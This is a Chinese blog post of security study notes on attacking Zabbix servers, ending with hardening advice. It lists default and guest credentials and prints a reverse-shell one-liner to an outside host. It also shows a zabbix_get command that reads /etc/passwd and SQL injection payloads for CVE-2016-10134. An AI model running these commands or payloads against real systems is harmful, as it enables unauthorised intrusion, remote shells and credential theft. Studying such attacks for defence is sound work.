• 94702

    文章

  • 787

    评论

  • 12

    友链

  • 最近新加了换肤功能,大家多来逛逛吧~~~~
  • 喜欢这个网站的朋友可以加一下QQ群,我们一起交流技术。

网络安全Day07

撸了今年阿里、腾讯和美团的面试,我有一个重要发现.......>>

zabbix

Zabbix配置不当安全事件
 
sohu的zabbix,可导致内网渗透
http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0127627
京东某站shell直入jae内网物理机内核版本过低
 
Zabbix弱口令利用
 
zabbix默认的口令为Admin:zabbix,以及存在guest密码为空
Zabbix server可以远程在agent的机器上执行任意命令
建立监控项
zabbix_get命令调用
 
登录后可以在后台自定义脚本,执行命令。
默认安装后是开启了guest账户的,如果没有禁止,可以通过guest账户登录,查看信息
 
这个模块是agent自带的,获取服务器shell,获取root权限。
监控项:
bash -i >& /dev/tcp/45.xx.xxx.x1/6666 0>&1
nc -lvp 6666
zabbix_get命令调用:
zabbix_get -s 172.18.0.4 -k 'system.run[cat /etc/passwd]'
 
Zabbix注入
 
latest.php SQL注入漏洞(CVE-2016-10134)
Payload: latest.php?output=ajax&sid=055e1ffa36164a58&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0)
jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)
 
Zabbix攻击方法
 
默认口令
注入漏洞
BurpSuite爆破口令
 
修复建议
 
不要放外网
修改默认密码
禁用gueset用户
不要以root启动
401认证
备份数据->升级版本
 

695856371Web网页设计师②群 | 喜欢本站的朋友可以收藏本站,或者加入我们大家一起来交流技术!

欢迎来到梁钟霖个人博客网站。本个人博客网站提供最新的站长新闻,各种互联网资讯。 还提供个人博客模板,最新最全的java教程,java面试题。在此我将尽我最大所能将此个人博客网站做的最好! 谢谢大家,愿大家一起进步!

转载原创文章请注明出处,转载至: 梁钟霖个人博客www.liangzl.com

0条评论

Loading...


发表评论

电子邮件地址不会被公开。 必填项已用*标注

自定义皮肤 主体内容背景
打开支付宝扫码付款购买视频教程
遇到问题联系客服QQ:419400980
注册梁钟霖个人博客